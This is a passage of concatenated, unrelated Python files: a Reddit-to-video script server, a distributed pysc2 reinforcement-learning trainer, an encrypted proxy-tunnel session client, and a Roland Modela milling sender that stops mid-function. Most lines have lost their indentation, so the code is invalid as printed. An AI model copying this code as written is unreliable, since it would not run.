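# exist on disk). Kept as comments so importing this module starts nothing:
#
#     vd = VideoDetection(model_name='Sample_Model', min_conf_threshold=0.5)
#     vd.detect(video_name="Sample_Video/testvideo1.mp4", focal_width=1000, debug=True)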
|
initserver.py
|
import settings
settings.generateConfigFile()
import reddit
import socketserverhandler
import socketservervideogenerator
from time import sleep
import database
import datetime
from threading import Thread
import atexit
def getScripts():
global lastUpdate
print("Grabbing more scripts...")
info = reddit.getInfo('AskReddit', settings.reddit_amount_posts)
new_scripts = len([script for script in info if not script.update])
updating_scripts = len([script for script in info if script.update])
print("Adding %s new scripts, updating %s" % (new_scripts, updating_scripts))
for script in info:
if script.update:
database.updateSubmission(script)
else:
database.addSubmission(script)
lastUpdate = datetime.datetime.now()
lastUpdate = None
def updateScripts():
while True:
sleep(10)
if lastUpdate is None:
getScripts()
now = datetime.datetime.now()
        if lastUpdate.hour != now.hour:
print("Getting more scripts - last update at %s" % lastUpdate)
getScripts()
def init():
socketserverhandler.startServer()
socketservervideogenerator.startVideoGeneratorServer()
thread = Thread(target=updateScripts)
thread.start()
#youtubequeue.initQueue()
#socketclient.connectToServer()
#print(checkValueExists("scriptid", "t5_2qh1i"))
#updateScriptStatus("EDITING", "t5_2qh1i")
#print(getVideoCountFromStatus("RAW"))
#print(getRowCount("scripts"))
def exit_handler():
print("Safe Exit")
socketserverhandler.socket.close()
socketservervideogenerator.socket.close()
if __name__ == "__main__":
atexit.register(exit_handler)
init()
|
clone_one_eval_mini_srcgame_add_map_bn.py
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
USED_DEVICES = "4,5"
import os
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID"
os.environ["CUDA_VISIBLE_DEVICES"] = USED_DEVICES
import sys
import threading
import time
import tensorflow as tf
from absl import app
from absl import flags
from pysc2 import maps
from pysc2.lib import stopwatch
import lib.config as C
import param as P
import mini_source_agent_add_map_bn as mini_source_agent
from mini_network_add_map_bn import MiniNetwork
# from pysc2.env import sc2_env
from lib import my_sc2_env as sc2_env
from lib.replay_buffer import Buffer
from strategy.terran_agent import DummyTerran
from strategy_env import SimulatePlatform
import unit.protoss_unit as P  # NOTE: rebinds P, shadowing "import param as P" above
import unit.terran_unit as T
from datetime import datetime
import multiprocessing as mp
import numpy as np
from logging import warning as logging
FLAGS = flags.FLAGS
flags.DEFINE_bool("training", True, "Whether to train agents.")
flags.DEFINE_bool("on_server", True, "Whether is running on server.")
flags.DEFINE_bool("debug_mode", True, "Whether is debuging")
flags.DEFINE_integer("num_for_update", 100, "Number of episodes for each train.")
flags.DEFINE_string("log_path", "./logs/", "Path for log.")
flags.DEFINE_string("device", USED_DEVICES, "Device for training.")
# Simple64
flags.DEFINE_string("map", "Simple64", "Name of a map to use.")
flags.DEFINE_bool("render", False, "Whether to render with pygame.")
flags.DEFINE_integer("screen_resolution", 64, "Resolution for screen feature layers.")
flags.DEFINE_integer("minimap_resolution", 64, "Resolution for minimap feature layers.")
flags.DEFINE_enum("agent_race", "P", sc2_env.races.keys(), "Agent's race.")
flags.DEFINE_enum("bot_race", "T", sc2_env.races.keys(), "Bot's race.")
flags.DEFINE_enum("difficulty", "7", sc2_env.difficulties.keys(), "Bot's strength.")
flags.DEFINE_integer("max_agent_steps", 18000, "Total agent steps.")
flags.DEFINE_integer("step_mul", 8, "Game steps per agent step.")
flags.DEFINE_bool("profile", False, "Whether to turn on code profiling.")
flags.DEFINE_bool("trace", False, "Whether to trace the code execution.")
flags.DEFINE_bool("save_replay", False, "Whether to replays_save a replay at the end.")
flags.DEFINE_string("replay_dir", "multi-agent/", "dir of replay to replays_save.")
# 20200825-101942_mini
# 20200828-160609_source
flags.DEFINE_string("restore_model_path", "./model/20200901-213813_mini/", "path for restore model")
flags.DEFINE_bool("restore_model", True, "Whether to restore old model")
flags.DEFINE_string("restore_from", "mini", "mini (for Thought-Game) or source (for Real game)")
flags.DEFINE_string("restore_to", "source", "mini (for Thought-Game) or source (for Real game)")
flags.DEFINE_bool("load_latest", False, "Load latest or bestest model, default is False")
flags.DEFINE_integer("parallel", 10, "How many processes to run in parallel.")
flags.DEFINE_integer("thread_num", 5, "How many thread to run in the process.")
flags.DEFINE_integer("port_num", 8770, "the start port to create distribute tf")
flags.DEFINE_integer("max_iters", 100, "the rl agent max run iters")
flags.DEFINE_string("game_version", None, "game version of SC2")
flags.DEFINE_bool("freeze_head", True, "Whether freeze_head train agents.")
flags.DEFINE_bool("use_bn", False, "Whether use batch_norm to training.")
flags.DEFINE_bool("use_sep_net", False, "Whether use seperate network for policy and value model.")
flags.DEFINE_integer("ob_space_add", 4, "Add state space from thought game.")
flags.DEFINE_integer("act_space_add", 5, "Add action space from thought game.")
flags.DEFINE_bool("add_image", False, "Whether add image for input.")
flags.DEFINE_string("weighted_sum_type", "AddWeight", "add weighted sum type, AddWeight, AdaptiveWeight, AttentionWeight")
FLAGS(sys.argv)
# set the play map
play_map = C.get_map_class('lib.config.' + FLAGS.map)
C.my_sub_pos = play_map.my_sub_pos
C.enemy_sub_pos = play_map.enemy_sub_pos
C.enemy_main_pos = play_map.enemy_main_pos
C.base_camera_pos = play_map.base_camera_pos
if not FLAGS.on_server or FLAGS.debug_mode:
PARALLEL = 1
THREAD_NUM = 1
MAX_AGENT_STEPS = 18000
DEVICE = ['/gpu:0']
NUM_FOR_UPDATE = 1
TRAIN_ITERS = 1
PORT_NUM = FLAGS.port_num
else:
PARALLEL = FLAGS.parallel
THREAD_NUM = FLAGS.thread_num
MAX_AGENT_STEPS = FLAGS.max_agent_steps
if USED_DEVICES == '-1':
DEVICE = ['/cpu:0']
else:
DEVICE = ['/gpu:' + str(dev) for dev in range(len(FLAGS.device.split(',')))]
NUM_FOR_UPDATE = FLAGS.num_for_update
TRAIN_ITERS = FLAGS.max_iters
PORT_NUM = FLAGS.port_num
LOG = FLAGS.log_path
if not os.path.exists(LOG):
os.makedirs(LOG)
SERVER_DICT = {"worker": [], "ps": []}
# define some global variable
UPDATE_EVENT, ROLLING_EVENT = threading.Event(), threading.Event()
Counter = 0
Waiting_Counter = 0
Update_Counter = 0
Result_List = []
'''
ps -ef |grep liuruoze | grep 'SC2_x64' | awk '{print $2}' | xargs kill -9
kill -9 `ps -ef |grep liuruoze | grep eval_mini_srcgame_add_map_bn | awk '{print $2}' `
'''
def run_thread(agent, game_num, Synchronizer, difficulty):
global UPDATE_EVENT, ROLLING_EVENT, Counter, Waiting_Counter, Update_Counter, Result_List
num = 0
all_num = 0
proc_name = mp.current_process().name
C._FPS = 22.4 / FLAGS.step_mul # 5.6
step_mul = FLAGS.step_mul # 4
C.difficulty = difficulty
with sc2_env.SC2Env(
map_name=FLAGS.map,
agent_race=FLAGS.agent_race,
bot_race=FLAGS.bot_race,
difficulty=difficulty,
step_mul=step_mul,
score_index=-1,
game_steps_per_episode=MAX_AGENT_STEPS,
screen_size_px=(FLAGS.screen_resolution, FLAGS.screen_resolution),
minimap_size_px=(FLAGS.minimap_resolution, FLAGS.minimap_resolution),
visualize=False,
game_version=FLAGS.game_version) as env:
# env = available_actions_printer.AvailableActionsPrinter(env)
agent.set_env(env)
while all_num != game_num * TRAIN_ITERS:
agent.play_right_add(verbose=FLAGS.debug_mode)
if FLAGS.training:
# check if the num of episodes is enough to update
num += 1
all_num += 1
reward = agent.result['reward']
Counter += 1
Result_List.append(reward)
logging("(diff: %d) %d epoch: %s get %d/%d episodes! return: %d!" %
(int(difficulty), Update_Counter, proc_name, len(Result_List), game_num * THREAD_NUM, reward))
# time for update
if num == game_num:
num = 0
ROLLING_EVENT.clear()
# worker stops rolling, wait for update
if agent.index != 0 and THREAD_NUM > 1:
Waiting_Counter += 1
if Waiting_Counter == THREAD_NUM - 1: # wait for all the workers stop
UPDATE_EVENT.set()
ROLLING_EVENT.wait()
# update!
else:
if THREAD_NUM > 1:
UPDATE_EVENT.wait()
Synchronizer.wait() # wait for other processes to update
agent.update_network(Result_List)
Result_List.clear()
agent.global_buffer.reset()
Synchronizer.wait()
Update_Counter += 1
# finish update
UPDATE_EVENT.clear()
Waiting_Counter = 0
ROLLING_EVENT.set()
if FLAGS.save_replay:
env.save_replay(FLAGS.replay_dir)
agent.reset()
def Worker(index, update_game_num, Synchronizer, cluster, model_path, log_path):
config = tf.ConfigProto(
allow_soft_placement=True, log_device_placement=False,
)
config.gpu_options.allow_growth = True
worker = tf.train.Server(cluster, job_name="worker", task_index=index, config=config)
sess = tf.Session(target=worker.target, config=config)
summary_writer = tf.summary.FileWriter(log_path)
Net = MiniNetwork(sess=sess, summary_writer=summary_writer, rl_training=FLAGS.training,
cluster=cluster, index=index, device=DEVICE[index % len(DEVICE)],
ppo_load_path=FLAGS.restore_model_path, ppo_save_path=model_path,
ob_space_add=FLAGS.ob_space_add, act_space_add=FLAGS.act_space_add,
freeze_head=FLAGS.freeze_head, use_bn=FLAGS.use_bn,
use_sep_net=FLAGS.use_sep_net, restore_model=FLAGS.restore_model,
restore_from=FLAGS.restore_from, restore_to=FLAGS.restore_to,
load_latest=FLAGS.load_latest, add_image=FLAGS.add_image)
global_buffer = Buffer()
agents = []
for i in range(THREAD_NUM):
agent = mini_source_agent.MiniSourceAgent(index=i, global_buffer=global_buffer, net=Net,
restore_model=FLAGS.restore_model, rl_training=FLAGS.training,
strategy_agent=None, ob_space_add=FLAGS.ob_space_add)
agents.append(agent)
print("Worker %d: waiting for cluster connection..." % index)
sess.run(tf.report_uninitialized_variables())
print("Worker %d: cluster ready!" % index)
while len(sess.run(tf.report_uninitialized_variables())):
print("Worker %d: waiting for variable initialization..." % index)
time.sleep(1)
print("Worker %d: variables initialized" % index)
    # True division is needed here: np.ceil of a floor-divided value is a no-op.
    game_num = np.ceil(update_game_num / THREAD_NUM)
UPDATE_EVENT.clear()
ROLLING_EVENT.set()
# Run threads
threads = []
for i in range(THREAD_NUM - 1):
t = threading.Thread(target=run_thread, args=(agents[i], game_num, Synchronizer, FLAGS.difficulty))
threads.append(t)
t.daemon = True
t.start()
time.sleep(3)
run_thread(agents[-1], game_num, Synchronizer, FLAGS.difficulty)
for t in threads:
t.join()
def Parameter_Server(Synchronizer, cluster, log_path, model_path, procs):
config = tf.ConfigProto(
allow_soft_placement=True, log_device_placement=False,
)
config.gpu_options.allow_growth = True
server = tf.train.Server(cluster, job_name="ps", task_index=0, config=config)
sess = tf.Session(target=server.target, config=config)
summary_writer = tf.summary.FileWriter(log_path)
Net = MiniNetwork(sess=sess, summary_writer=summary_writer, rl_training=FLAGS.training,
cluster=cluster, index=0, device=DEVICE[0 % len(DEVICE)],
ppo_load_path=FLAGS.restore_model_path, ppo_save_path=model_path,
ob_space_add=FLAGS.ob_space_add, act_space_add=FLAGS.act_space_add,
freeze_head=FLAGS.freeze_head, use_bn=FLAGS.use_bn,
use_sep_net=FLAGS.use_sep_net,
restore_model=FLAGS.restore_model,
restore_from=FLAGS.restore_from, restore_to=FLAGS.restore_to,
load_latest=FLAGS.load_latest, add_image=FLAGS.add_image)
agent = mini_source_agent.MiniSourceAgent(index=-1, net=Net, restore_model=FLAGS.restore_model,
rl_training=FLAGS.training, ob_space_add=FLAGS.ob_space_add)
print("Parameter server: waiting for cluster connection...")
sess.run(tf.report_uninitialized_variables())
print("Parameter server: cluster ready!")
print("Parameter server: initializing variables...")
agent.init_network()
print("Parameter server: variables initialized")
update_counter = 0
max_win_rate = 0.
latest_win_rate = 0.
while update_counter < TRAIN_ITERS:
agent.reset_old_network()
# wait for update
Synchronizer.wait()
logging("Update Network!")
        # TODO: count the time, compare CPU and GPU
time.sleep(1)
# update finish
Synchronizer.wait()
logging("Update Network finished!")
steps, win_rate = agent.update_summary(update_counter)
logging("Steps: %d, win rate: %f" % (steps, win_rate))
update_counter += 1
if win_rate >= max_win_rate:
agent.save_model()
max_win_rate = win_rate
latest_win_rate = win_rate
agent.net.save_latest_policy()
return max_win_rate, latest_win_rate
def _main(unused_argv):
# create distribute tf cluster
start_port = PORT_NUM
SERVER_DICT["ps"].append("localhost:%d" % start_port)
for i in range(PARALLEL):
SERVER_DICT["worker"].append("localhost:%d" % (start_port + 1 + i))
Cluster = tf.train.ClusterSpec(SERVER_DICT)
now = datetime.now()
model_path = "./model/" + now.strftime("%Y%m%d-%H%M%S") + "_source/"
if not os.path.exists(model_path):
os.makedirs(model_path)
log_path = "./logs/" + now.strftime("%Y%m%d-%H%M%S") + "_source/"
UPDATE_GAME_NUM = NUM_FOR_UPDATE
per_update_num = np.ceil(UPDATE_GAME_NUM / PARALLEL)
Synchronizer = mp.Barrier(PARALLEL + 1)
# Run parallel process
procs = []
for index in range(PARALLEL):
p = mp.Process(name="Worker_%d" % index, target=Worker, args=(index, per_update_num, Synchronizer, Cluster, model_path, log_path))
procs.append(p)
p.daemon = True
p.start()
time.sleep(1)
max_win_rate, latest_win_rate = Parameter_Server(Synchronizer, Cluster, log_path, model_path, procs)
print('#######################')
print('Best Win_rate:', max_win_rate)
print('Latest Win_rate:', latest_win_rate)
print('#######################')
for p in procs:
p.join()
'''
if FLAGS.profile:
print(stopwatch.sw)
'''
if __name__ == "__main__":
app.run(_main)
|
proxy_session.py
|
import time
import json
import threading
import struct
import urlparse
from xlog import getLogger
xlog = getLogger("x_tunnel")
from simple_http_client import HTTP_client
import utils
import base_container
import encrypt
import global_var as g
def encrypt_data(data):
if g.config.encrypt_data:
return encrypt.Encryptor(g.config.encrypt_password, g.config.encrypt_method).encrypt(data)
else:
return data
def decrypt_data(data):
if g.config.encrypt_data:
return encrypt.Encryptor(g.config.encrypt_password, g.config.encrypt_method).decrypt(data)
else:
return data
class ProxySession():
def __init__(self):
self.upload_task_queue = base_container.BlockSendPool(max_payload=g.config.block_max_size, send_delay=0)
self.ack_pool = base_container.AckPool()
self.mutex = threading.Lock() # lock for conn_id, sn generation, on_road_num change,
self.download_order_queue = base_container.BlockReceivePool(process_callback=self.download_data_processor)
self.running = False
self.start()
def start(self):
self.ack_pool.reset()
self.download_order_queue.reset()
self.roundtrip_thread = {}
self.session_id = utils.generate_random_lowercase(8)
self.last_conn_id = 0
self.last_transfer_no = 0
self.conn_list = {}
self.transfer_list = {}
self.last_roundtrip_time = 0
self.on_road_num = 0
self.last_download_data_time = 0
self.traffic = 0
if not self.login_session():
xlog.warn("x-tunnel session not start")
return False
self.running = True
self.upload_task_queue.start()
server_port = g.server_port
for i in range(0, g.config.concurent_thread_num):
if g.config.port_range > 1:
server_port += 1
if server_port > g.server_port + g.config.port_range:
server_port = g.server_port
server_address = (g.server_host, server_port)
self.roundtrip_thread[i] = threading.Thread(target=self.normal_roundtrip_worker, args=(server_address,))
self.roundtrip_thread[i].daemon = True
self.roundtrip_thread[i].start()
def stop(self):
if not self.running:
#xlog.warn("stop but not running")
return
self.running = False
self.session_id = ""
self.balance = 0
self.close_all_connection()
self.upload_task_queue.stop()
#xlog.debug("begin join roundtrip_thread")
for i in self.roundtrip_thread:
# xlog.debug("begin join %d", i)
rthead = self.roundtrip_thread[i]
if rthead is threading.current_thread():
# xlog.debug("%d is self", i)
continue
rthead.join()
# xlog.debug("end join %d", i)
#xlog.debug("end join roundtrip_thread")
def reset(self):
xlog.debug("session reset")
self.stop()
self.start()
def status(self):
out_string = "session_id:%s<br>\n" % self.session_id
out_string += "running:%d<br>\n" % self.running
out_string += "last_roundtrip_time:%d<br>\n" % (time.time() - self.last_roundtrip_time)
out_string += "last_download_data_time:%d<br>\n" % (time.time() - self.last_download_data_time)
out_string += "last_conn_id:%d<br>\n" % self.last_conn_id
out_string += "last_transfer_no:%d<br>\n" % self.last_transfer_no
out_string += "on_road_num:%d<br>\n" % self.on_road_num
out_string += "transfer_list:<br>\r\n"
for transfer_no in sorted(self.transfer_list.iterkeys()):
transfer = self.transfer_list[transfer_no]
if "start" in self.transfer_list[transfer_no]:
time_way = " t:" + str((time.time() - self.transfer_list[transfer_no]["start"]))
else:
time_way = ""
out_string += "[%d] %s %s<br>\r\n" % (transfer_no, json.dumps(transfer), time_way)
out_string += "<br>\n" + self.upload_task_queue.status()
out_string += "<br>\n" + self.download_order_queue.status()
out_string += "<br>\n" + self.ack_pool.status()
for conn_id in self.conn_list:
out_string += "<br>\n" + self.conn_list[conn_id].status()
return out_string
def login_session(self):
if len(g.server_host) == 0 or g.server_port == 0:
return False
try:
start_time = time.time()
magic = "P"
pack_type = 1
upload_data_head = struct.pack("<cBB8sIHII", magic, g.protocol_version, pack_type, str(self.session_id),
g.config.block_max_size, g.config.send_delay, g.config.windows_size,
g.config.windows_ack)
upload_data_head += struct.pack("<H", len(g.config.login_account)) + str(g.config.login_account)
upload_data_head += struct.pack("<H", len(g.config.login_password)) + str(g.config.login_password)
upload_post_data = encrypt_data(upload_data_head)
http_client = HTTP_client((g.server_host, g.server_port), g.proxy, g.config.use_https,
g.config.conn_life, cert=g.cert)
content, status, heads = http_client.request(method="POST", path="data", data=upload_post_data,
timeout=g.config.roundtrip_timeout)
time_cost = time.time() - start_time
if status != 200:
g.last_api_error = "session server login fail:%r" % status
xlog.warn("login session fail, status:%r", status)
return False
if len(content) < 6:
xlog.error("login data len:%d fail", len(content))
return False
info = decrypt_data(content)
magic, protocol_version, pack_type, res, message_len = struct.unpack("<cBBBH", info[:6])
message = info[6:]
if magic != "P" or protocol_version != 1 or pack_type != 1:
xlog.error("login_session time:%d head error:%s", 1000 * time_cost, utils.str2hex(info[:6]))
return False
if res != 0:
g.last_api_error = "session server login fail, code:%d msg:%s" % (res, message)
xlog.warn("login_session time:%d fail, res:%d msg:%s", 1000 * time_cost, res, message)
return False
g.last_api_error = ""
xlog.info("login_session time:%d msg:%s", 1000 * time_cost, message)
return True
except Exception as e:
xlog.exception("login_session e:%r", e)
return False
def create_conn(self, sock, host, port):
if not self.running:
xlog.warn("session not running, can't connect")
return
self.mutex.acquire()
self.last_conn_id += 1
conn_id = self.last_conn_id
self.mutex.release()
seq = 0
cmd_type = 0 # create connection
sock_type = 0 # TCP
data = struct.pack("<IBBH", seq, cmd_type, sock_type, len(host)) + host + struct.pack("<H", port)
self.send_conn_data(conn_id, data)
self.conn_list[conn_id] = base_container.Conn(self, conn_id, sock, host, port, g.config.windows_size,
g.config.windows_ack, True, xlog)
return conn_id
def close_all_connection(self):
xlog.info("start close all connection")
conn_list = dict(self.conn_list)
for conn_id in conn_list:
try:
xlog.debug("stopping conn_id:%d", conn_id)
self.conn_list[conn_id].stop(reason="system reset")
except Exception as e:
xlog.warn("stopping conn_id:%d fail:%r", conn_id, e)
pass
# self.conn_list = {}
xlog.debug("stop all connection finished")
def remove_conn(self, conn_id):
xlog.debug("remove conn_id:%d", conn_id)
try:
del self.conn_list[conn_id]
except:
pass
def send_conn_data(self, conn_id, data, no_delay=False):
if not self.running:
return
# xlog.debug("upload conn_id:%d, len:%d", conn_id, len(data))
buf = base_container.WriteBuffer()
buf.append(struct.pack("<BII", 2, 4 + len(data), conn_id))
buf.append(data)
self.upload_task_queue.put(buf, no_delay)
def download_data_processor(self, data):
try:
while len(data):
data_type, data_len = struct.unpack("<BI", data.get(5))
if data_type == 2: # data:
conn_id = struct.unpack("<I", data.get(4))[0]
payload = data.get_buf(data_len - 4)
if conn_id not in self.conn_list:
xlog.debug("DATA conn_id %d not in list", conn_id)
else:
# xlog.debug("down conn:%d len:%d", conn_id, len(payload))
self.conn_list[conn_id].put_cmd_data(payload)
else:
raise Exception("process_block, unknown type:%d" % data_type)
except Exception as e:
xlog.exception("download_data_processor:%r", e)
def touch_roundtrip(self):
self.upload_task_queue.put("")
def get_transfer_no(self):
with self.mutex:
self.last_transfer_no += 1
transfer_no = self.last_transfer_no
return transfer_no
def normal_roundtrip_worker(self, server_address):
last_roundtrip_download_size = 0
http_client = HTTP_client(server_address, g.proxy, g.config.use_https, g.config.conn_life, cert=g.cert)
while self.running:
if self.on_road_num > g.config.concurent_thread_num * 0.8:
block = True
elif last_roundtrip_download_size > g.config.block_max_size:
block = False
elif len(self.conn_list) > 0 and self.on_road_num < 1:
# keep at least one pulling thread
block = False
elif len(self.conn_list) > 0 and time.time() - self.last_download_data_time < 120 and \
self.on_road_num < g.config.concurent_thread_num * 0.1:
# busy, have data download
block = False
else:
block = True
if block:
get_timeout = 24 * 3600
else:
get_timeout = 0
# self.transfer_list[transfer_no]["stat"] = "get local data"
upload_data, send_sn = self.upload_task_queue.get(get_timeout)
transfer_no = self.get_transfer_no()
self.transfer_list[transfer_no] = {}
self.transfer_list[transfer_no]["sn"] = send_sn
send_data_len = len(upload_data)
upload_ack_data = self.ack_pool.get()
send_ack_len = len(upload_ack_data)
magic = "P"
pack_type = 2
if self.on_road_num > g.config.concurent_thread_num * 0.8:
server_timeout = 0
else:
server_timeout = g.config.roundtrip_timeout / 2
upload_data_head = struct.pack("<cBB8sIIBIH", magic, g.protocol_version, pack_type, str(self.session_id),
transfer_no,
send_sn, server_timeout, send_data_len, send_ack_len)
upload_post_buf = base_container.WriteBuffer(upload_data_head)
upload_post_buf.append(upload_data)
upload_post_buf.append(upload_ack_data)
upload_post_data = str(upload_post_buf)
upload_post_data = encrypt_data(upload_post_data)
try_no = 0
while self.running:
try_no += 1
sleep_time = min(try_no, 30)
self.last_roundtrip_time = time.time()
start_time = time.time()
with self.mutex:
self.on_road_num += 1
# xlog.debug("start roundtrip transfer_no:%d send_data_len:%d ack_len:%d", transfer_no, send_data_len, send_ack_len)
try:
self.transfer_list[transfer_no]["try"] = try_no
self.transfer_list[transfer_no]["stat"] = "request"
self.transfer_list[transfer_no]["start"] = time.time()
content, status, response = http_client.request(method="POST", path="data", data=upload_post_data,
timeout=g.config.roundtrip_timeout)
traffic = len(upload_post_data) + len(content) + 645
self.traffic += traffic
g.quota -= traffic
except Exception as e:
xlog.exception("request except:%r retry %d", e, try_no)
time.sleep(sleep_time)
continue
finally:
with self.mutex:
self.on_road_num -= 1
if status == 405: # session_id not exist on server
if self.running:
xlog.warn("server session_id not exist, start reset session")
self.reset()
return
elif status == 200:
recv_len = len(content)
if recv_len < 6:
xlog.error("roundtrip time:%d transfer_no:%d sn:%d send:%d status:%r retry:%d",
(time.time() - start_time) * 1000, transfer_no, send_sn, send_data_len, len(content),
status, try_no)
continue
content = decrypt_data(content)
data = base_container.ReadBuffer(content)
magic, version, pack_type = struct.unpack("<cBB", data.get(3))
if magic != "P" or version != g.protocol_version:
xlog.error("get data head:%s", utils.str2hex(content[:2]))
time.sleep(100)
break
if pack_type == 3: # error report
error_code, message_len = struct.unpack("<BH", data.get(3))
message = data.get(message_len)
xlog.warn("error report code:%d, msg:%s", error_code, message)
if error_code == 1: # no quota
xlog.warn("login x_server error:no quota")
self.stop()
return
else:
xlog.error("unknown error code:%d", error_code)
return
if pack_type != 2: # normal download traffic pack
xlog.error("pack type:%d", pack_type)
time.sleep(100)
break
sn, time_cost = struct.unpack("<II", data.get(8))
xlog.debug(
"roundtrip time:%d cost:%d transfer_no:%d send_sn:%d send:%d recv_sn:%d rcv:%d status:%r",
(time.time() - start_time) * 1000, time_cost, transfer_no, send_sn, send_data_len, sn,
len(content), status)
data_len = len(data)
if (sn > 0 and data_len == 0) or (sn == 0 and data_len > 0):
xlog.warn("get sn:%d len:%d %s", sn, data_len, data)
if sn:
self.last_download_data_time = time.time()
last_roundtrip_download_size = data_len
# xlog.debug("get sn:%d len:%d", sn, data_len)
self.download_order_queue.put(sn, data)
ack_pak = struct.pack("<Q", transfer_no)
self.ack_pool.put(ack_pak)
else:
last_roundtrip_download_size = 0
if send_data_len == 0 and data_len > g.config.block_max_size:
need_more_thread_num = int(g.config.concurent_thread_num * 0.5 - self.on_road_num)
if need_more_thread_num > 0:
for j in range(0, need_more_thread_num):
if self.on_road_num > g.config.concurent_thread_num * 0.5:
break
self.touch_roundtrip()
break
else:
xlog.warn("roundtrip time:%d transfer_no:%d send_sn:%d send:%d status:%r retry:%d",
(time.time() - start_time) * 1000, transfer_no, send_sn, send_data_len, status, try_no)
time.sleep(sleep_time)
del self.transfer_list[transfer_no]
xlog.info("roundtrip port:%d thread exit", server_address[1])
def calculate_quota_left(quota_list):
time_now = int(time.time())
quota_left = 0
if "current" in quota_list:
c_q_end_time = quota_list["current"]["end_time"]
if c_q_end_time > time_now:
quota_left += quota_list["current"]["quota"]
if "backup" in quota_list:
for qt in quota_list["backup"]:
b_q_quota = qt["quota"]
b_q_end_time = qt["end_time"]
if b_q_end_time < time_now:
continue
quota_left += b_q_quota
return quota_left
def get_api_server_http_client():
api_server = urlparse.urlparse(g.config.api_server)
http_client = HTTP_client((api_server.hostname, api_server.port), g.proxy, g.config.use_https, g.config.conn_life,
cert=g.cert)
return http_client
def call_api(path, req_info):
try:
start_time = time.time()
upload_post_data = json.dumps(req_info)
upload_post_data = encrypt_data(upload_post_data)
http_client = get_api_server_http_client()
content, status, heads = http_client.request(method="POST", path=path,
header={"Content-Type": "application/json"},
data=upload_post_data, timeout=g.config.roundtrip_timeout)
time_cost = time.time() - start_time
if status != 200:
reason = "status:%r" % status
xlog.warn("api:%s fail:%s t:%d", path, reason, time_cost)
g.last_api_error = reason
return False, reason
content = decrypt_data(content)
try:
info = json.loads(content)
except Exception as e:
g.last_api_error = "parse json fail"
xlog.warn("api:%s parse json:%s fail:%r", path, content, e)
return False, "parse json fail"
res = info["res"]
if res != "success":
g.last_api_error = info["reason"]
xlog.warn("api:%s fail:%s", path, info["reason"])
return False, info["reason"]
xlog.info("api:%s success t:%d", path, time_cost * 1000)
g.last_api_error = ""
return True, info
except Exception as e:
xlog.exception("order e:%r", e)
g.last_api_error = "%r" % e
return False, "except:%r" % e
def request_balance(account, password, is_register=False, update_server=True):
if is_register:
login_path = "register"
xlog.info("request_balance register:%s", account)
else:
login_path = "login"
req_info = {"account": account, "password": password}
res, info = call_api(login_path, req_info)
if not res:
return False, info
g.quota_list = info["quota_list"]
g.quota = calculate_quota_left(g.quota_list)
if g.quota <= 0:
xlog.warn("no quota")
if update_server:
g.server_host = str(info["host"])
g.server_port = info["port"]
xlog.info("update xt_server %s:%d", g.server_host, g.server_port)
g.balance = info["balance"]
xlog.info("request_balance host:%s port:%d balance:%f quota:%f", g.server_host, g.server_port,
g.balance, g.quota)
return True, "success"
|
rml_send.py
|
#
# rml_send_gui
# graphical interface for sending jobs to the Roland Modela
#
# Brian Mayton <bmayton@media.mit.edu>
# MIT 2011-2014
#
# (c) Massachusetts Institute of Technology 2011-2014
# Permission granted for experimental and personal use;
# license for commercial sale available from MIT.
# imports
from __future__ import with_statement
import serial
import sys
# import wx # Fiore Basile - Removed dependency
import threading
import time
import math
# global constants
RML_UNITS=40.0
SPEED_TRAVERSE = 15.0
# utility functions
def dist(x1, y1, z1, x2, y2, z2):
return math.sqrt(
pow(x1-x2, 2.0) +
pow(y1-y2, 2.0) +
pow(z1-z2, 2.0)
)
# Edited by Fiore on 10/06/2014
# to support callbacks so that info can be passed to the SockJS server
class RMLSender:
"""This class implements the parsing of RML files and sending to the
Modela."""
def __init__(self, port="/dev/ttyUSB0", target=None):
self.serialPort = port
self.serial = None
self.cmds = []
self.target = target
self.xr=[0,1]; self.yr=[0,1]; self.zr=[0,1]
self.paths = []
self.segments_done = []
self.traverses = []
self.traverses_done = []
self.speed_feed = 15.0
self.speed_plunge = 5.0
self.total_distance = 1.0
self.distance_milled = 0.0
self.total_time = 1.0
self.time_remaining = 1.0
self.time_start = None
self.current_cmd = ""
self.cur_cmd_start = time.time()
self.cur_cmd_duration = 0.0
self.running = False
self.thread = threading.Thread(target=self.thread_fn)
self.should_stop = threading.Event()
self.done = threading.Event()
self.aborted = threading.Event()
self.lock = threading.Lock()
def load_file(self, filename):
self.cmds = []
f = open(filename, "r")
data = f.read()
f.close()
self.cmds = data.split(";")
self.calculate_metrics()
## FB: Added callback
if self.target:
self.target.callback('millingInfo', self)
def calculate_metrics(self):
paths = []
traverses = []
cur_path = []
        xmin, ymin, zmin = 999999999, 999999999, 999999999
xmax, ymax, zmax = 0, 0, 0
xpos, ypos, zpos = 0, 0, 0
zup, zdown = 0, 0
speeds, speedz = 0.0, 0.0
total_distance = 0.0
total_time = 0.0
in_path = False
for cmd in self.cmds:
cmd=cmd.strip()
try:
if cmd[:3] == "!PZ":
params = cmd[3:].split(',')
if len(params) < 2:
params = cmd[3:].split(' ')
zup = int(params[1])
zdown = int(params[0])
print "pen: %d up, %d down" % (zup, zdown)
elif cmd[:2] == "VS":
params = cmd[2:].split(',')
if len(params) < 2:
params = cmd[2:].split(' ')
speeds = float(params[0])
print "xy speed: %f mm/s" % (speeds)
elif cmd[:3] == "!VZ":
params = cmd[3:].split(',')
if len(params) < 2:
params = cmd[3:].split(' ')
speedz = float(params[0])
print "z speed: %f mm/s" % (speedz)
elif cmd[:2] == "PU":
params = cmd[2:].split(',')
if len(params) < 2:
params = cmd[2:].split(' ')
if len(params) < 2:
continue
x = int(params[0])
y = int(params[1])
z = zup
d = dist(xpos, ypos, zpos, x, y, z)
total_distance += d
total_time += d / RML_UNITS / SPEED_TRAVERSE
traverses.append([(xpos, ypos, zpos), (x, y, z)])
xpos = x; ypos = y; zpos = z;
xmax = max(x, xmax); ymax = max(y, ymax); zmax = max(z, zmax)
xmin = min(x, xmin); ymin = min(y, ymin); zmin = min(z, zmin)
if len(cur_path) > 0:
paths.append(cur_path)
cur_path = []
elif cmd[:1] == "Z":
params = cmd[1:].split(',')
if len(params) < 2:
params = cmd[1:].split(' ')
x = int(params[0])
y = int(params[1])
z = int(params[2])
dist_xy = math.hypot(xpos-x, ypos-y) / RML_UNITS
                    dist_z = abs(zpos - z) / RML_UNITS  # abs: distance, not a signed delta
time_xy = dist_xy / speeds
time_z = dist_z / speedz
total_time += max(time_xy, time_z)
total_distance += dist(xpos, ypos, zpos, x, y, z)
